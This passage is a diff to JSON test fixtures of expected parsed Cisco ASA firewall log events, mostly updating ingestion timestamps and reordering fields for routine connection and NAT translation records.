"2021-12-09T13:31:36.363252300Z", + "ingested": "2021-12-14T14:36:23.392245262Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363256500Z", + "ingested": "2021-12-14T14:36:23.392245669Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363260700Z", + "ingested": "2021-12-14T14:36:23.392246064Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363265400Z", + "ingested": "2021-12-14T14:36:23.392246470Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363269900Z", + "ingested": "2021-12-14T14:36:23.392247074Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363274400Z", + "ingested": "2021-12-14T14:36:23.392247468Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363279300Z", + "ingested": "2021-12-14T14:36:23.392248018Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363283900Z", + "ingested": "2021-12-14T14:36:23.392248420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363288600Z", + "ingested": "2021-12-14T14:36:23.392248807Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363293800Z", + "ingested": "2021-12-14T14:36:23.392249323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363299700Z", + "ingested": "2021-12-14T14:36:23.392249716Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:31:36.363337100Z", + "ingested": "2021-12-14T14:36:23.392250189Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363344400Z", + "ingested": "2021-12-14T14:36:23.392250602Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363350400Z", + "ingested": "2021-12-14T14:36:23.392251094Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363356400Z", + "ingested": "2021-12-14T14:36:23.392251480Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", 
@@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363361Z", + "ingested": "2021-12-14T14:36:23.392251904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1998,7 +1998,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363365200Z", + "ingested": "2021-12-14T14:36:23.392252406Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", @@ -2080,7 +2080,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363369600Z", + "ingested": "2021-12-14T14:36:23.392252794Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", @@ -2159,7 +2159,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363373300Z", + "ingested": "2021-12-14T14:36:23.392253186Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", @@ -2242,7 +2242,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363377600Z", + "ingested": "2021-12-14T14:36:23.392253672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", 
@@ -2321,7 +2321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363381600Z", + "ingested": "2021-12-14T14:36:23.392254085Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", @@ -2405,7 +2405,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363385800Z", + "ingested": "2021-12-14T14:36:23.392254568Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2489,7 +2489,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363389800Z", + "ingested": "2021-12-14T14:36:23.392254955Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -2574,7 +2574,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363394100Z", + "ingested": "2021-12-14T14:36:23.392255340Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", @@ -2658,7 +2658,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363398400Z", + "ingested": "2021-12-14T14:36:23.392255785Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", 
@@ -2740,7 +2740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363403Z", + "ingested": "2021-12-14T14:36:23.392256223Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", @@ -2819,7 +2819,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363406900Z", + "ingested": "2021-12-14T14:36:23.392256604Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", @@ -2902,7 +2902,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363410500Z", + "ingested": "2021-12-14T14:36:23.392257106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", @@ -2981,7 +2981,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363414600Z", + "ingested": "2021-12-14T14:36:23.392257504Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3065,7 +3065,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363419500Z", + "ingested": "2021-12-14T14:36:23.392257899Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -3150,7 +3150,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363424600Z", + "ingested": "2021-12-14T14:36:23.392258410Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", @@ -3234,7 +3234,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363429100Z", + "ingested": "2021-12-14T14:36:23.392258869Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", @@ -3316,7 +3316,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363433500Z", + "ingested": "2021-12-14T14:36:23.392259266Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", @@ -3395,7 +3395,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363438Z", + "ingested": "2021-12-14T14:36:23.392259657Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", @@ -3479,7 +3479,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363442900Z", + "ingested": "2021-12-14T14:36:23.392260044Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -3563,7 +3563,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363447Z", + "ingested": "2021-12-14T14:36:23.392260435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -3648,7 +3648,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363452100Z", + "ingested": "2021-12-14T14:36:23.392262447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", @@ -3732,7 +3732,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363457900Z", + "ingested": "2021-12-14T14:36:23.392262943Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", @@ -3814,7 +3814,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363462700Z", + "ingested": "2021-12-14T14:36:23.392263331Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", @@ -3893,7 +3893,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363466400Z", + "ingested": "2021-12-14T14:36:23.392263722Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", 
@@ -3979,7 +3979,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363470900Z", + "ingested": "2021-12-14T14:36:23.392264102Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", @@ -4062,7 +4062,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363476700Z", + "ingested": "2021-12-14T14:36:23.392264580Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4147,7 +4147,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363481500Z", + "ingested": "2021-12-14T14:36:23.392265013Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4231,7 +4231,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363486Z", + "ingested": "2021-12-14T14:36:23.392265531Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", @@ -4313,7 +4313,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363490600Z", + "ingested": "2021-12-14T14:36:23.392265915Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", 
@@ -4392,7 +4392,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363496500Z", + "ingested": "2021-12-14T14:36:23.392266300Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", @@ -4475,7 +4475,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363502300Z", + "ingested": "2021-12-14T14:36:23.392266749Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", @@ -4554,7 +4554,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363524200Z", + "ingested": "2021-12-14T14:36:23.392267189Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363529500Z", + "ingested": "2021-12-14T14:36:23.392267571Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363534100Z", + "ingested": "2021-12-14T14:36:23.392267957Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", 
@@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363539300Z", + "ingested": "2021-12-14T14:36:23.392268339Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363544500Z", + "ingested": "2021-12-14T14:36:23.392268746Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363548400Z", + "ingested": "2021-12-14T14:36:23.392269258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363553Z", + "ingested": "2021-12-14T14:36:23.392269650Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363558700Z", + "ingested": "2021-12-14T14:36:23.392270031Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", 
@@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363562600Z", + "ingested": "2021-12-14T14:36:23.392270420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363567600Z", + "ingested": "2021-12-14T14:36:23.392270805Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363571800Z", + "ingested": "2021-12-14T14:36:23.392271194Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363576300Z", + "ingested": "2021-12-14T14:36:23.392272037Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363580400Z", + "ingested": "2021-12-14T14:36:23.392272437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", 
@@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363585300Z", + "ingested": "2021-12-14T14:36:23.392272904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363590500Z", + "ingested": "2021-12-14T14:36:23.392273296Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363596800Z", + "ingested": "2021-12-14T14:36:23.392273739Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363601500Z", + "ingested": "2021-12-14T14:36:23.392274178Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -5854,7 +5851,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363606100Z", + "ingested": "2021-12-14T14:36:23.392274558Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363610400Z", + "ingested": "2021-12-14T14:36:23.392274950Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363614200Z", + "ingested": "2021-12-14T14:36:23.392275335Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6063,25 +6060,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363619200Z", + "ingested": "2021-12-14T14:36:23.392275877Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363623600Z", + "ingested": "2021-12-14T14:36:23.392276337Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", 
